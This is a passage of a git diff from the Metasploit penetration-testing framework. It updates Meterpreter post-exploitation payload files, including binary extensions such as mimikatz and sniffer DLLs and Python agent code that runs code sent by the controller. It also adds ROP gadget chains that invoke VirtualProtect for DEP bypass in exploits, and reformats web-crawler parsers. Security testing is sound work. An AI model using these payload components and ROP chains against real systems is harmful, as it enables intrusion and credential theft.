chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};

BIN
data/meterpreter/common.lib Executable file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

67
data/meterpreter/ext_server_stdapi.py
View File

@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
@ -273,6 +275,9 @@ ERROR_FAILURE = 1
# errors.
ERROR_CONNECTION_ERROR = 10000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
@ -290,6 +295,27 @@ def get_stat_buffer(path):
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo():
if not has_windll:
return None
@ -687,6 +713,40 @@ def stdapi_fs_stat(request, response):
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_host(request, response):
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
result = resolve_host(hostname, family)
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_resolve_hosts(request, response):
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
if family == WIN_AF_INET:
family = socket.AF_INET
elif family == WIN_AF_INET6:
family = socket.AF_INET6
else:
raise Exception('invalid family')
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
hostname = hostname['value']
try:
result = resolve_host(hostname, family)
except socket.error:
result = {'family':family, 'packed_address':''}
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_net_socket_tcp_shutdown(request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
@ -842,9 +902,12 @@ def stdapi_registry_query_value(request, response):
if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
return ERROR_SUCCESS, response
return ERROR_FAILURE, response

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

20
data/meterpreter/meterpreter.py
View File

@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
offset += tlv[0]
return {}
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
raise StopIteration()
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
@ -271,7 +289,7 @@ class PythonMeterpreter(object):
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/msflinker_linux_x86.bin
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

36
data/msfcrawler/basic.rb
View File

@ -18,29 +18,29 @@ require 'uri'
class CrawlerSimple < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
doc = Hpricot(result.body.to_s)
doc.search('a').each do |link|
doc = Hpricot(result.body.to_s)
doc.search('a').each do |link|
hr = link.attributes['href']
hr = link.attributes['href']
if hr and !hr.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',hr,request['uri'],nil)
if hr and !hr.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',hr,request['uri'],nil)
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end

76
data/msfcrawler/forms.rb
View File

@ -18,60 +18,60 @@ require 'uri'
class CrawlerForms < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
hr = ''
m = ''
doc = Hpricot(result.body.to_s)
doc.search('form').each do |f|
hr = f.attributes['action']
doc = Hpricot(result.body.to_s)
doc.search('form').each do |f|
hr = f.attributes['action']
fname = f.attributes['name']
if fname.empty?
fname = "NONE"
end
fname = f.attributes['name']
if fname.empty?
fname = "NONE"
end
m = "GET"
if !f.attributes['method'].empty?
m = f.attributes['method'].upcase
end
m = "GET"
if !f.attributes['method'].empty?
m = f.attributes['method'].upcase
end
#puts "Parsing form name: #{fname} (#{m})"
#puts "Parsing form name: #{fname} (#{m})"
htmlform = Hpricot(f.inner_html)
htmlform = Hpricot(f.inner_html)
arrdata = []
arrdata = []
htmlform.search('input').each do |p|
#puts p.attributes['name']
#puts p.attributes['type']
#puts p.attributes['value']
htmlform.search('input').each do |p|
#puts p.attributes['name']
#puts p.attributes['type']
#puts p.attributes['value']
#raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end
#raw_request has uri_encoding disabled as it encodes '='.
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
end
data = arrdata.join("&").to_s
data = arrdata.join("&").to_s
begin
hreq = urltohash(m,hr,request['uri'],data)
begin
hreq = urltohash(m,hr,request['uri'],data)
hreq['ctype'] = 'application/x-www-form-urlencoded'
hreq['ctype'] = 'application/x-www-form-urlencoded'
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end

34
data/msfcrawler/frames.rb
View File

@ -14,28 +14,28 @@ require 'uri'
class CrawlerFrames < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
doc = Hpricot(result.body.to_s)
doc.search('iframe').each do |ifra|
doc = Hpricot(result.body.to_s)
doc.search('iframe').each do |ifra|
ir = ifra.attributes['src']
ir = ifra.attributes['src']
if ir and !ir.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',ir,request['uri'],nil)
if ir and !ir.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',ir,request['uri'],nil)
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Error"
end
end
end
end
rescue URI::InvalidURIError
#puts "Error"
end
end
end
end
end

36
data/msfcrawler/image.rb
View File

@ -15,29 +15,29 @@ require 'uri'
class CrawlerImage < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
doc = Hpricot(result.body.to_s)
doc.search('img').each do |i|
doc = Hpricot(result.body.to_s)
doc.search('img').each do |i|
im = i.attributes['src']
im = i.attributes['src']
if im and !im.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',im,request['uri'],nil)
if im and !im.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',im,request['uri'],nil)
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{i[0]}"
end
end
end
end
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{i[0]}"
end
end
end
end
end

36
data/msfcrawler/link.rb
View File

@ -15,29 +15,29 @@ require 'uri'
class CrawlerLink < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
doc = Hpricot(result.body.to_s)
doc.search('link').each do |link|
doc = Hpricot(result.body.to_s)
doc.search('link').each do |link|
hr = link.attributes['href']
hr = link.attributes['href']
if hr and !hr.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',hr,request['uri'],nil)
if hr and !hr.match(/^(\#|javascript\:)/)
begin
hreq = urltohash('GET',hr,request['uri'],nil)
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end
end

36
data/msfcrawler/objects.rb
View File

@ -18,31 +18,31 @@ require 'uri'
class CrawlerObjects < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
hr = ''
m = ''
doc = Hpricot(result.body.to_s)
doc.search("//object/embed").each do |obj|
doc = Hpricot(result.body.to_s)
doc.search("//object/embed").each do |obj|
s = obj['src']
s = obj['src']
begin
hreq = urltohash('GET',s,request['uri'],nil)
begin
hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end

36
data/msfcrawler/scripts.rb
View File

@ -18,31 +18,31 @@ require 'uri'
class CrawlerScripts < BaseParser
def parse(request,result)
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
hr = ''
m = ''
doc = Hpricot(result.body.to_s)
doc.search("//script").each do |obj|
doc = Hpricot(result.body.to_s)
doc.search("//script").each do |obj|
s = obj['src']
s = obj['src']
begin
hreq = urltohash('GET',s,request['uri'],nil)
begin
hreq = urltohash('GET',s,request['uri'],nil)
insertnewpath(hreq)
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end

66
data/ropdb/hxds.xml Normal file
View File

@ -0,0 +1,66 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>2007</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
<gadget offset="0x0008bfae">Writable location</gadget>
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
<gadget offset="0x0002c840">JMP [EAX]</gadget>
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>2010</target>
</compatibility>
<gadgets base="0x51bd0000">
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
<gadget value="ffffffc0">0x00000040</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
<gadget offset="0x0008c638">Writable location</gadget>
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
<gadget offset="0x00073335">POP ESI # RETN</gadget>
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
<gadget offset="0x00076452">POP EAX # RETN</gadget>
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
</gadgets>
</rop>
</db>

2
data/ropdb/java.xml
View File

@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget>
<gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget>

53
data/ropdb/msvcrt.xml
View File

@ -7,12 +7,21 @@
</compatibility>
<gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@ -33,23 +42,29 @@
</compatibility>
<gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget>
<gadget offset="0x0004ff56">Writable location</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x00029801">POP EBP # RETN</gadget>
<gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets>
</rop>

4
data/sounds/aiff2wav.rb
View File

@ -1,7 +1,7 @@
#!/usr/bin/env ruby
Dir.open(".").entries.grep(/.aiff$/).each do |inp|
out = inp.gsub(".aiff", ".wav")
system("sox #{inp} #{out}")
out = inp.gsub(".aiff", ".wav")
system("sox #{inp} #{out}")
end

46
data/sounds/gensounds_mac.rb
View File

@ -1,34 +1,34 @@
sounds = {
'num0' => '0',
'num1' => '1',
'num2' => '2',
'num3' => '3',
'num4' => '4',
'num5' => '5',
'num6' => '6',
'num7' => '7',
'num8' => '8',
'num9' => '9',
'closed' => 'closed',
'opened' => 'opened',
'plugin_load' => 'meta sploit sound plugin has been loaded',
'plugin_unload' => 'sound plugin has been unloaded',
'session' => 'session',
'address' => 'address',
'port' => 'port',
'dot' => 'dot',
'session_open_meterpreter' => 'a new meterp reter session has been opened',
'session_open_shell' => 'a new command shell session has been opened',
'session_open_vnc' => 'a new VNC session has been opened'
'num0' => '0',
'num1' => '1',
'num2' => '2',
'num3' => '3',
'num4' => '4',
'num5' => '5',
'num6' => '6',
'num7' => '7',
'num8' => '8',
'num9' => '9',
'closed' => 'closed',
'opened' => 'opened',
'plugin_load' => 'meta sploit sound plugin has been loaded',
'plugin_unload' => 'sound plugin has been unloaded',
'session' => 'session',
'address' => 'address',
'port' => 'port',
'dot' => 'dot',
'session_open_meterpreter' => 'a new meterp reter session has been opened',
'session_open_shell' => 'a new command shell session has been opened',
'session_open_vnc' => 'a new VNC session has been opened'
}
voice_name = 'Zarvox'
def create_aiff(voice, file,text)
system("say -v #{voice} -o #{file}.aiff #{text}")
system("say -v #{voice} -o #{file}.aiff #{text}")
end
sounds.keys.each do |k|
create_aiff(voice_name, k, sounds[k])
create_aiff(voice_name, k, sounds[k])
end

13
data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 26
https://metasploit.com:443
END

13
data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
